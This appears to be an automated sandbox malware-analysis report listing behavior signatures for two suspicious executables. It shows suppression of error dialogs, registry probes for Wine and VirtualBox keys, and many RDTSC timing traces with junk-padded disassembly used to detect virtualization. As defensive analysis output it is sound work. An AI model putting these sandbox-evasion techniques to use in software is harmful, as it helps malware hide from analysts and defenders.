Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 45EFDD second address: 45EFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 45EFE1 second address: 45E7A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FF698BF10CFh 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D27ABh], edi 0x00000017 push dword ptr [ebp+122D0479h] 0x0000001d jmp 00007FF698BF10CDh 0x00000022 call dword ptr [ebp+122D2FA6h] 0x00000028 pushad 0x00000029 stc 0x0000002a xor eax, eax 0x0000002c jo 00007FF698BF10CCh 0x00000032 mov dword ptr [ebp+122D3303h], edx 0x00000038 jnl 00007FF698BF10C7h 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 stc 0x00000043 mov dword ptr [ebp+122D2807h], eax 0x00000049 jmp 00007FF698BF10D8h 0x0000004e mov esi, 0000003Ch 0x00000053 stc 0x00000054 clc 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 sub dword ptr [ebp+122D3303h], esi 0x0000005f lodsw 0x00000061 jmp 00007FF698BF10CEh 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a cld 0x0000006b jmp 00007FF698BF10CCh 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 jmp 00007FF698BF10D5h 0x00000079 nop 0x0000007a push edi 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 45E7A4 second address: 45E7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E0EF1 second address: 5E0F0B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF698BF10D4h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E1085 second address: 5E109D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1B4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E11E1 second address: 5E11ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF698BF10CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E1353 second address: 5E136C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E1618 second address: 5E165A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007FF698BF10D2h 0x0000000b jmp 00007FF698BF10D5h 0x00000010 pop esi 0x00000011 jmp 00007FF698BF10CAh 0x00000016 popad 0x00000017 push edx 0x00000018 jl 00007FF698BF10D2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E3C15 second address: 5E3C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jng 00007FF698E1E1B2h 0x0000000d jc 00007FF698E1E1ACh 0x00000013 js 00007FF698E1E1A6h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007FF698E1E1AEh 0x00000022 mov eax, dword ptr [eax] 0x00000024 jne 00007FF698E1E1B1h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E3C5F second address: 45E7A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007FF698BF10C6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jmp 00007FF698BF10CEh 0x00000012 push dword ptr [ebp+122D0479h] 0x00000018 jnc 00007FF698BF10CCh 0x0000001e call dword ptr [ebp+122D2FA6h] 0x00000024 pushad 0x00000025 stc 0x00000026 xor eax, eax 0x00000028 jo 00007FF698BF10CCh 0x0000002e mov dword ptr [ebp+122D3303h], edx 0x00000034 jnl 00007FF698BF10C7h 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e stc 0x0000003f mov dword ptr [ebp+122D2807h], eax 0x00000045 jmp 00007FF698BF10D8h 0x0000004a mov esi, 0000003Ch 0x0000004f stc 0x00000050 clc 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 sub dword ptr [ebp+122D3303h], esi 0x0000005b lodsw 0x0000005d jmp 00007FF698BF10CEh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 cld 0x00000067 jmp 00007FF698BF10CCh 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 jmp 00007FF698BF10D5h 0x00000075 nop 0x00000076 push edi 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E3CB6 second address: 5E3CFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push edi 0x0000000e jmp 00007FF698E1E1B6h 0x00000013 pop edi 0x00000014 pop esi 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D3303h], edx 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D27ABh], edi 0x00000024 call 00007FF698E1E1A9h 0x00000029 pushad 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f popad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E3CFE second address: 5E3D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E3D04 second address: 5E3D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF698E1E1B5h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E3E52 second address: 5E3EB0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF698BF10C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cl, 89h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FF698BF10C8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edx, eax 0x0000002b add si, 5400h 0x00000030 call 00007FF698BF10C9h 0x00000035 jp 00007FF698BF10CEh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push edi 0x0000003f jo 00007FF698BF10C6h 0x00000045 pop edi 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5E40F5 second address: 5E40FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5F5FBC second address: 5F5FC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5CD5AD second address: 5CD5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 603716 second address: 60371C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60371C second address: 603749 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF698E1E1A6h 0x00000008 jmp 00007FF698E1E1AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 jns 00007FF698E1E1AAh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 603749 second address: 60375C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10CFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 603E17 second address: 603E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6041F1 second address: 60423A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF698BF10CBh 0x0000000d jmp 00007FF698BF10D9h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF698BF10D8h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60423A second address: 60424F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60424F second address: 60426D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10D8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60426D second address: 60427D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60427D second address: 60428D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60428D second address: 604293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 604293 second address: 604297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 604297 second address: 60429D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60429D second address: 6042AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF698BF10C6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60442E second address: 604433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5FA3B4 second address: 5FA3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5FA3B8 second address: 5FA3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5D9244 second address: 5D9252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FF698BF10C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5D9252 second address: 5D925A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60459D second address: 6045A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6045A1 second address: 6045A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60503A second address: 605050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 605050 second address: 605056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 605351 second address: 60538A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF698BF10D7h 0x00000008 jmp 00007FF698BF10D9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60538A second address: 6053A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1AAh 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6053A3 second address: 6053A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6053A8 second address: 6053C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1B8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5C6CC1 second address: 5C6CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5D0C24 second address: 5D0C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5D0C28 second address: 5D0C3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FF698BF10C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5D0C3D second address: 5D0C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF698E1E1ADh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60FA75 second address: 60FA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60FA79 second address: 60FA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60FA81 second address: 60FA9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF698BF10D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FF698BF10C6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 60FA9D second address: 60FAB4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698E1E1ACh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 614026 second address: 614032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FF698BF10C6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 614032 second address: 614036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6141BF second address: 6141CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF698BF10C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6141CA second address: 6141DD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF698E1E1A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6141DD second address: 6141EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10CAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 614741 second address: 614785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF698E1E1B0h 0x0000000e jne 00007FF698E1E1C1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 614785 second address: 61478F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF698BF10C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 614F46 second address: 614F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61500C second address: 61502C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF698BF10D3h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61502C second address: 615070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF698E1E1B3h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF698E1E1B8h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615070 second address: 6150C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c js 00007FF698BF10DAh 0x00000012 push eax 0x00000013 jmp 00007FF698BF10D2h 0x00000018 pop eax 0x00000019 pop eax 0x0000001a jmp 00007FF698BF10D4h 0x0000001f call 00007FF698BF10C9h 0x00000024 push eax 0x00000025 push edx 0x00000026 jp 00007FF698BF10CCh 0x0000002c jc 00007FF698BF10C6h 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6150C2 second address: 6150FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF698E1E1A8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jmp 00007FF698E1E1B1h 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jp 00007FF698E1E1AEh 0x0000001e jo 00007FF698E1E1A8h 0x00000024 pushad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push ebx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6150FA second address: 61510B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61510B second address: 61510F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61510F second address: 615113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615267 second address: 61526C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615438 second address: 61544E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007FF698BF10D2h 0x0000000e jl 00007FF698BF10CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615D5B second address: 615D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615D9F second address: 615DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615DA3 second address: 615DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615DA9 second address: 615DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D7h 0x00000009 rdtsc
